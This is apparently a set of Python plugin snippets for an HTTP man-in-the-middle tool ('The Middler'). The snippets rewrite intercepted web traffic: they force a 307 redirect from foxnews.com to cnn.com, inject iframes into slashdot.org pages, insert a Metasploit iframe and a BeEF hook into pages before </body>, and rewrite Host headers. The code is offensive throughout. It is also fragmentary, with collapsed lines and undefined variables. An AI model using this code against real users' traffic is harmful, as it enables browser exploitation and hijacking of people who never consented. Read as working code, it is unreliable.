def doResponse(session, request_header, response_header, data): changed = 0 stop = 0 i = 1 # Check to see if we've got the right target site target = "www.foxnews.com" request_match = (("Host",target),) redirect_url = "http://www.cnn.com" if header.headertest(request_header,request_match): # We could make sure only to do this if the browser was getting a web page. response_match = (("Content-type","TEXT/HTML"),) if header.headertest( response_header,response_match ): # Check the response code line. response_code_line = response_header[0][1] (protover,response_code,reason) = response_code_line.split(" ") print ("Response code line had these elements --%s-- --%s-- --%s\n" % (protover,response_code,reason) ) # Make sure we are only doing this on a 200 message. if response_code != "200": ml.jjlog.debug("Response code was %s, not 200, so we won't inject here\n" % response_code) return(response_header, data, changed, stop) # Change the response code to a 30x redirect. # Choose one of these two. response_code = 307 reason = "Temporary Redirect\n" #response_code = 301 #reason = "Moved Permanently" header.headerfix(response_header,"Response",("%s %s %s" % (protover,response_code,reason)) ) # Check if there is a Location header already? # TODO: make a routine that inserts a new header after a specific line. if header.headerget(response_header,"Location") and redirect_url: header.headerfix( response_header, "Location", redirect_url + "\n") ml.jjlog.debug("Replaced the location: %s\n" % redirect_url) else: response_header.append( ("Location",redirect_url + "\n") ) ml.jjlog.debug("Appended our own location: %s\n" % redirect_url) # We have changed the header and we don't want any other plugins to touch it. # TODO: Decide on how to do priority/dependencies/ordering so redirects go first. changed = 1 stop = 1 return(response_header, data, changed, stop)
def doResponse(session, request_header, response_header, data): changed = 0 stop = 0 i = 1 # Check to see if we've got the right target site target = "slashdot.org" request_match = (("Host",target),) # Set up the IFRAME to inject into the HTML # TODO: Set the traffic capture code that gets my IP address to log it into # some kind of global or class variable. inserted_url = "http://www.inguardians.com/tools/logo-themiddler-150px.jpg" iframe = '''<iframe height=103 width=150 src="%s"></iframe>''' % (inserted_url) if header.headertest(request_header,request_match): # We could make sure only to do this if the browser was getting a web page. response_match = (("Content-type","TEXT/HTML"),) if header.headertest( response_header,response_match ): # Check the response code line. response_code_line = response_header[0][1] (protover,response_code,reason) = response_code_line.split(" ",2) ml.jjlog.debug("Response code line had these elements --%s-- --%s-- --%s\n" % (protover,response_code,reason) ) # Make sure we are only doing this on a 200 message. # There's no point to injecting into a 30x redirect! if response_code != "200": return(response_header, data, changed, stop) ml.jjlog.debug("Preparing to inject iframe into request for %s" % target) ### MANIPULATE DATA - INSERT SCRIPT data = re.sub(r'\<body\>', r'<body>' + iframe, data) changed = 1 ### Correct the content-length. header.headerfix(response_header, "Content-Length", str(len(data))) # We have changed the header and we don't want any other plugins to touch it. # TODO: Decide on how to do priority/dependencies/ordering so redirects go first. changed = 1 stop = 1 return(response_header, data, changed, stop)
def doResponse(session, request_header, response_header, data): changed = 0 stop = 0 ### DETERMINE IF WE NEED TO CHANGE DATA if header.headertest(request_header, request_match) & header.headertest(response_header, response_match): ### MANIPULATE DATA data = redirect_code print("User has been redirected to " + redirect_url) ### RETURN DATA if changed: header.headerfix(response_header, "Content-Length", str(len(data))) return(response_header, data, changed, stop)
def doResponse(session, request_header, response_header, data): changed = 0 stop = 0 ### DETERMINE IF WE NEED TO CHANGE DATA if header.headertest(request_header, request_match) & header.headertest(response_header, response_match): ### MANIPULATE DATA - INSERT SCRIPT data = re.sub('</body>', code1 + '</body>', data) changed = 1 print("Metasploit iframe injected") ### RETURN DATA if changed: header.headerfix(response_header, "Content-Length", str(len(data))) return(response_header, data, changed, stop)
def doResponse(session, request_header, response_header, data): changed = 0 stop = 0 ### DETERMINE IF WE NEED TO CHANGE DATA if header.headertest(request_header, request_match) & header.headertest(response_header, response_match): ### MANIPULATE DATA - INSERT SCRIPT data = re.sub('</body>', code1 + '</body>', data) changed = 1 print("BeEF hook injected") ### RETURN DATA if changed: header.headerfix(response_header, "Content-Length", str(len(data))) return(response_header, data, changed, stop)
def doRequest(session, request_header, data): changed = 0 stop = 0 # Bug - this routine is only changing the Host header, but isn't # changing the socket's destination. Further, the host # header shouldn't contain a full URL, just a hostname. # Remember, the Host header was an HTTP/1.1 addition # intended to tell the remote server which virtual # host the browser was requesting. # if 0 and header.headertest(request_header, request_match): ### MANIPULATE DATA changed = 1 stop = 1 header.headerfix(request_header, "Host", redirect_url + '\r\n') print("User request URL has been rewritten to " + redirect_url) ### RETURN DATA return (request_header, data, changed, stop)